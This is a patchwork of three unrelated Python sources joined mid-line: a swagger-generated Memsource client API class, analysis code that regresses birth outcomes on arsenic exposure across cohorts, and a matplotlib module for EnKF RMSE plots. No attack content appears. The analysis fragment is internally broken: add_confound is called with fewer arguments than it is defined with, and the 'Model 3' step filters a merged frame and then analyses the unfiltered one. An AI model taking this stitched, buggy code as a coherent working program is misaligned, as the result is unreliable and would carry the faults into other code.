Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class ClientApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_client(self, body, **kwargs): # noqa: E501
"""Create client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_client(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClientEditDto body: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_client_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_client_with_http_info(body, **kwargs) # noqa: E501
return data
def create_client_with_http_info(self, body, **kwargs): # noqa: E501
"""Create client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_client_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClientEditDto body: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_client`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/clients', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClientDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_client(self, client_id, **kwargs): # noqa: E501
"""Delete client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_client(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_client_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.delete_client_with_http_info(client_id, **kwargs) # noqa: E501
return data
def delete_client_with_http_info(self, client_id, **kwargs): # noqa: E501
"""Delete client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_client_with_http_info(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `delete_client`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['clientId'] = params['client_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/clients/{clientId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_client(self, client_id, **kwargs): # noqa: E501
"""Get client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_client_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.get_client_with_http_info(client_id, **kwargs) # noqa: E501
return data
def get_client_with_http_info(self, client_id, **kwargs): # noqa: E501
"""Get client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client_with_http_info(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_client`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['clientId'] = params['client_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/clients/{clientId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClientDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_clients(self, **kwargs): # noqa: E501
"""List clients # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_clients(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Unique name of the Client
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoClientDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_clients_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_clients_with_http_info(**kwargs) # noqa: E501
return data
def list_clients_with_http_info(self, **kwargs): # noqa: E501
"""List clients # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_clients_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Unique name of the Client
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoClientDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_clients" % key
)
params[key] = val
del params['kwargs']
if 'page_number' in params and params['page_number'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_number` when calling `list_clients`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] > 50: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `list_clients`, must be a value less than or equal to `50`") # noqa: E501
if 'page_size' in params and | |
</b> ' + str(X.shape[0]) + '</div>'
header += '<div> <b> Model: </b>' + fit_string + '</div>'
header += '<div> <b> Group: </b> CohortType '
htmls = header + ret.tables[0].to_html() + ret.tables[1].to_html()
return htmls
def crude_binomial_mixedML(df_merged, x_feature, y_feature,covars):
df_merged = df_merged.replace(-9,np.nan).replace('-9',np.nan).replace(999,np.nan).replace(888,np.nan)
if covars == 'False':
data = df_merged[[x_feature,y_feature,'CohortType']].dropna(how = 'any', axis='rows')
data[x_feature] = data[x_feature] + 1
data[y_feature] = data[y_feature].astype(int)
random = {"a": '0 + C(CohortType)'}
fit_string = y_feature + '~' + x_feature
if covars == 'True':
random = {"a": '0 + C(CohortType)'}
data = add_confound(df_merged, x_feature, y_feature)
## create the model string for
fit_string = y_feature + '~'
cnt = 0
## filter out target, at birth, and reference dummy variables in model
for x in data.columns:
#data.drop(['education'], inplace = True, axis = 0)
if x != 'birthWt' and x !='Outcome_weeks' and x!= 'Outcome' and x != 'PIN_Patient' and x != 'SGA' and x != 'LGA' \
and x !='birthLen' and x != 'CohortType' and x != 'race' and x!='race_1' and x!= 'smoking' and x != 'smoking_3' \
and x != 'education_5' and x != 'education':
if cnt == 0:
fit_string += ' ' + x + ' '
else:
fit_string += ' + ' + x + ' '
cnt+=1
data[y_feature] = data[y_feature].astype(int)
## miced linear model with group variable = CohortType
md = statsmodels.genmod.bayes_mixed_glm.BinomialBayesMixedGLM.from_formula(
fit_string, random, data)
##fit the model
mdf = md.fit_vb()
return mdf.summary()
def crude_mixedMLbayse(df_merged, x_feature, y_feature, covars='False', logit = False):
#TODO: Replace covars variable with actual selection of indivdual features
df_merged = df_merged.replace(-9,np.nan).replace('-9',np.nan).replace(999,np.nan).replace(888,np.nan)
if covars == 'False':
data = df_merged[[x_feature,y_feature,'CohortType']].dropna(how = 'any', axis='rows')
fit_string = y_feature + '~' + x_feature
if covars == 'True':
data = add_confound(df_merged, x_feature, y_feature)
## create the model string for
fit_string = y_feature + '~'
cnt = 0
## filter out target, at birth, and reference dummy variables in model
for x in data.columns:
#data.drop(['education'], inplace = True, axis = 0)
if x != 'birthWt' and x !='Outcome_weeks' and x!= 'Outcome' and x != 'PIN_Patient' and x != 'SGA' and x != 'LGA' \
and x !='birthLen' and x != 'CohortType' and x != 'race' and x!='race_1' and x!= 'smoking' and x != 'smoking_3' \
and x != 'education_5' and x != 'education':
if cnt == 0:
fit_string += ' ' + x + ' '
else:
fit_string += ' + ' + x + ' '
cnt+=1
fit_string += '+ (1|CohortType)'
if logit == False:
model = bmb.Model(data)
results = model.fit(fit_string)
else:
model = bmb.Model(data)
results = model.fit(fit_string, family='bernoulli',link = 'logit')
## miced linear model with group variable = CohortType
mdf = az.summary(results)
return mdf
def verifyclean(df):
df = df.replace(-9,np.nan).replace('-9',np.nan).replace(999,np.nan).replace(888,np.nan)
return df
def add_confound(df_merged, x_feature, y_feature, conf):
print(df_merged.shape)
# check if confounders are added
if len(conf) > 1:
cols_to_mix = [x_feature, y_feature, 'PIN_Patient', 'CohortType'] + conf
else:
cols_to_mix = [x_feature, y_feature, 'PIN_Patient', 'CohortType']
# drop any missing values as mixed model requires complete data
df_nonan = df_merged[cols_to_mix].dropna(axis='rows')
#df_nonan['smoking'] = df_nonan['smoking'].astype(int)
print(df_nonan.shape)
## dummy race annd smoking varible
def add_cats(name, df_nonan, ref_val):
df_nonan[name] = df_nonan[name].astype('float').astype(int)
df = pd.concat([df_nonan, pd.get_dummies(df_nonan[name], prefix = name)], axis = 1)
#print(df.columns)
try:
df.drop([name,name + '_' + ref_val], inplace = True, axis = 1)
except:
pass
return df
if 'race' in conf: df_nonan = add_cats('race', df_nonan, '1')
if 'smoking' in conf: df_nonan = add_cats('smoking', df_nonan, '0')
if 'education' in conf: df_nonan = add_cats('education', df_nonan, '5')
return df_nonan
##text file writing function to shorten length of the code
def text_writing(name, frame, x_feat, y_feat, all_variables, path, output, txt_file_specifics, reg_type):
try:
text_file = open(path + txt_file_specifics, "w")
dims = frame.shape
text_file.write(str(frame[all_variables + [y_feat]].describe()))
text_file.write('\n')
text_file.write("Number of participants: {}\n".format(dims[0]))
text_file.write(str(output))
text_file.close()
except Exception as e:
text_file.write(reg_type + ' Error:*\n')
text_file.write(str(e))
text_file.close()
## main analysis
## with categories encoded
def runcustomanalysis1():
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
## Model 1: Restricted to participants with no fish/seafood consumption.
## Get data with no fish
df_NEU = adapters.neu.get_dataframe_nofish()
df_UNM = adapters.unm.get_dataframe_nofish()
df_DAR = adapters.dar.get_dataframe_nofish()
## merge data frames
df_NEUUNM = merge2CohortFrames(df_NEU,df_UNM)
df_NEUDAR = merge2CohortFrames(df_NEU,df_DAR)
df_UNMDAR = merge2CohortFrames(df_UNM,df_DAR)
df_merged_3 = merge3CohortFrames(df_NEU,df_UNM,df_DAR)
frames_for_analysis = [
('NEU', df_NEU),
('UNM', df_UNM),
('DAR', df_DAR),
('NEUUNM', df_NEUUNM),
('NEUDAR', df_NEUDAR),
('UNMDAR', df_UNMDAR),
('UNMDARNEU', df_merged_3),
]
for name, df in frames_for_analysis:
print('Data Stats')
print(name)
print(df.shape)
#set analysis parameters
x_feature = 'UTAS'
covars = 'babySex|BMI|parity|smoking|education'
all_vars = covars.split('|') + [x_feature]
Y_features_continous = ['Outcome_weeks','birthWt', 'headCirc', 'birthLen']
Y_features_binary = ['LGA','SGA','Outcome']
# set output paths for results:
output_path_model1_adj = '/usr/src/app/mediafiles/analysisresults/model1adj/'
output_path_model1_noadj = '/usr/src/app/mediafiles/analysisresults/model1noadj/'
try:
os.mkdir(output_path_model1_adj)
os.mkdir(output_path_model1_noadj)
except:
print('Exists')
# start analysis
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_adj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature), 'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_adj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#without adjustment
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_noadj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_noadj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#Model 2: Restricted to participants with arsenic speciation data.
## Get data with fish
df_UNM = adapters.unm.get_dataframe()
df_DAR = adapters.dar.get_dataframe_pred()
## merge data frames
df_UNMDAR = merge2CohortFrames(df_UNM,df_DAR)
frames_for_analysis = [
('UNM', df_UNM),
('DAR', df_DAR),
('UNMDAR', df_UNMDAR)
]
for name, df in frames_for_analysis:
print('Data Stats')
print(name)
print(df.shape)
x_feature = 'UTAS'
covars = 'babySex|BMI|parity|smoking|education'
all_vars = covars.split('|') + [x_feature]
Y_features_continous = ['Outcome_weeks','birthWt', 'headCirc', 'birthLen']
Y_features_binary = ['LGA','SGA','Outcome']
output_path_model2_adj = '/usr/src/app/mediafiles/analysisresults/model2adj/'
output_path_model2_noadj = '/usr/src/app/mediafiles/analysisresults/model2noadj/'
#output_path = '../mediafiles/analysisresults/'
try:
os.mkdir(output_path_model2_adj)
os.mkdir(output_path_model2_noadj)
except:
print('Exists')
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output= crude_reg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_adj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_adj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#without adjustment
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_noadj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_noadj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#Model 3: Restricted to arsenic speciation data with AsB ≤1 µg/L.
x_feature = 'UTAS'
covars = 'babySex|BMI|parity|smoking|education'
all_vars = covars.split('|') + [x_feature]
Y_features_continous = ['Outcome_weeks','birthWt', 'headCirc', 'birthLen']
Y_features_binary = ['LGA','SGA','Outcome']
## Number of Participants
output_path_model3_adj = '/usr/src/app/mediafiles/analysisresults/model3adj/'
output_path_model3_noadj = '/usr/src/app/mediafiles/analysisresults/model3noadj/'
#output_path = '../mediafiles/analysisresults/'
try:
os.mkdir(output_path_model3_adj)
os.mkdir(output_path_model3_noadj)
except:
print('Exists')
# remove the AsB <= 1
df_UNM = df_UNM[df_UNM['UASB'] <= 1]
df_DAR = df_DAR[df_DAR['UASB'] <= 1]
df_UNMDAR_UASB = df_UNMDAR[df_UNMDAR['UASB'] <= 1]
frames_for_analysis3 = [
('UNM', df_UNM),
('DAR', df_DAR),
('UNMDAR', df_UNMDAR)
]
for name, frame in frames_for_analysis3:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model3_adj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model3_adj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#no adj
for name, frame in frames_for_analysis3:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
| |
from matplotlib import colors
import numpy as np
import matplotlib.pyplot as plt
from pskf.tools.run import pythonmodule as pm
from pskf.tools.plot import plotarrays as pa
from pskf.scripts.errorplot import arrays as ea
###############################################################################
# Errorplot RMSE point plot #
###############################################################################
def plot(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
ensemble_sizes=[50, 70, 100, 250],
axistitle='',
model='wavebc',
is_std=False,
lineyval=0.62,
std_method='std',
pic_format='pdf',
figpos=[0.15, 0.3, 0.8, 0.6],
xlim_min=0,
xlim_max=None,
ylims=[0.28, 0.82],
is_textpos_auto=True,
textpos=[0.7, 0.6, 0.5, 0.4],
xdiff_nens=0.5,
yticks=[0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1],
ylabel=r'RMSE $\log(K[\mathrm{m}^2])$',
num_pack=4, # Number of methods in pack
is_text=False,
text_x=0.5,
text_y=0.5,
n_syn=1000,
legend_input=None,
formatsos=['o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p'],
coleros=[(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0)],
markersize=[10 for i in range(32)],
markeredgesize=1.5,
fontleg=30,
fonttit=40,
fontlab=40,
fonttic=30,
):
"""
A plotting function for statistics of residual distributions.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
model : string
'wavebc' - Model wavebc
'wave' - Model wave
is_std : boolean
True - Show errorbars of standard deviation
False - No errorbars
std_method : string
Standard deviation to use
'std' - Standard deviation
'stdm' - Standard deviation of mean
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
More input specifying plot parameters.
Returns
-------
ax : Axes
Axes containing plot.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
for enssize in ensemble_sizes:
if enssize not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError(
'Wrong ensemble size.'
)
# Title
ax.set_title(axistitle, size=fonttit)
# Number of methods
num_methods = len(which_methods)
# Default legend input
if legend_input is None:
legend_input = pa.longnames_methods
legend_input = np.array([legend_input[i].ljust(18)
for i in which_methods])
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'
))
# Load standard deviation
if is_std:
std = np.load(pm.py_output_filename(
'errorplot',
which_res,
std_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
ax.set_prop_cycle("color", ['k'])
ax.set_position(figpos)
for iens, enssize in enumerate(ensemble_sizes):
# x positions, up to 15 methods
x = np.delete(np.arange(0, 100),
np.arange(0, 100, num_pack+1))
# Skip one after num_pack+1 entries for vertical line
resplot = res[:, iens]
if is_std:
stdplot = std[:, iens]
# Plot
puntos = [] # Contains plotted points
ax.plot(x[:len(resplot)], resplot, 'k-', label=3)
for iplot in range(num_methods):
# Points
punto, = ax.plot(
x[iplot],
resplot[iplot],
formatsos[iplot],
lw=2,
ms=markersize[iplot],
label=legend_input[iplot],
c=coleros[iplot], mew=markeredgesize,
mec='black'
)
puntos.append(punto)
# Text
if iplot == num_methods-1:
ax.text(
x[iplot]+xdiff_nens,
resplot[iplot] if is_textpos_auto else textpos[iens],
r'$n_{e}$='+str(enssize),
verticalalignment='center',
horizontalalignment='left',
size=20,
)
# Error
if is_std:
ax.errorbar(
x[iplot],
resplot[iplot],
yerr=stdplot[iplot],
fmt=formatsos[iplot],
lw=2,
ms=markersize[iplot],
label='this',
mfc=coleros[iplot],
mew=markeredgesize,
mec='black'
)
# Legend
num_inleg = num_pack # Methods per legend (except last)
num_legs = int(num_methods/num_inleg
+ int(bool(np.mod(num_methods,
num_inleg)))) # Number of legends
num_inlastleg = (np.mod(num_methods, num_inleg)
if np.mod(num_methods, num_inleg) else
num_inleg) # Methods in last legend
leginds = [num_inleg-1+i*num_inleg
if i < num_legs-1 else
num_inleg-1+(i-1)*num_inleg+num_inlastleg
for i in range(num_legs)] # last method ind in each legend
legranges = [num_inleg if i < num_legs-1 else num_inlastleg
for i in range(num_legs)] # Methods in each legend
for ileg in range(num_legs):
xleg = figpos[0] + ileg*figpos[2]/num_legs
my_legend = ax.legend(
handles=[puntos[i]
for i in range(leginds[ileg]-legranges[ileg]+1,
leginds[ileg]+1)],
bbox_to_anchor=[xleg,
0.00,
figpos[2]/num_legs,
0.3],
bbox_transform=plt.gcf().transFigure,
# loc=[0.0, 1.0],
mode='expand',
# labelspacing=1.0,
ncol=1,
numpoints=1,
fontsize=fontleg,
framealpha=1.0,
markerscale=1.0
)
ax.add_artist(my_legend)
# Lines
for xline in range(0, 100, num_pack+1):
ax.vlines(xline, 0.0, 1.0, linestyles='dotted')
for yline in yticks:
ax.hlines(yline, 0, 100, linestyles='dotted')
ax.hlines(lineyval, 0, 100, linestyles='dashed')
# Text: Model name and n_syn in box
if is_text:
model_spec = ' Tracer ' if model == 'wavereal' else ' Well '
ax.text(
text_x, text_y,
model_spec+'\n'
+ r' $n_{syn}$: '+str(n_syn).rjust(4),
linespacing=1.5,
fontsize=30,
bbox={'facecolor': (0.8, 0.8, 0.8), 'alpha': 1.0, 'pad': 10},
)
# Style
ax.set_xlim([xlim_min, (num_legs*(num_pack+1) if xlim_max is None
else xlim_max)])
ax.set_ylabel(ylabel,
fontsize=fontlab,
labelpad=10)
ax.tick_params(direction='in', length=6,
width=1, labelsize=fonttic,
top=False, right=False, bottom=False,
pad=8)
ax.set_xticks([])
ax.set_yticks(yticks)
ax.get_xaxis().set_visible(False)
ax.set_ylim(ylims)
# Saving location
pic_name = pm.py_output_filename(
ea.tag,
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
pic_format
)
return ax, pic_name
###############################################################################
# Matrix plot of RMSE quotients #
###############################################################################
def quots(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
model='wavebc',
ensemble_sizes=[50, 70, 100, 250],
ensemble_size=50,
pic_format='pdf',
is_text=False,
axistitle='',
fonttit=40,
figpos=[0.32, 0.2, 0.6, 0.8],
ticksize=20,
):
"""
A function plotting a grid of quotients of
statistical measures.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
model : string
'wavebc' - Model wavebc
'wave' - Model wave
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
More input specifying plot parameters.
Returns
-------
ax : Axes
Axes containing quotient matrix.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
if ensemble_size not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError('ensemble_size wrong')
# Title
ax.set_title(axistitle, size=fonttit)
# Number of compared methods
num_methods = len(which_methods)
# Ensemble size translated to index
iens = pa.indens[model][ensemble_size]
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
# Calculate and sort quots
quots = np.array(
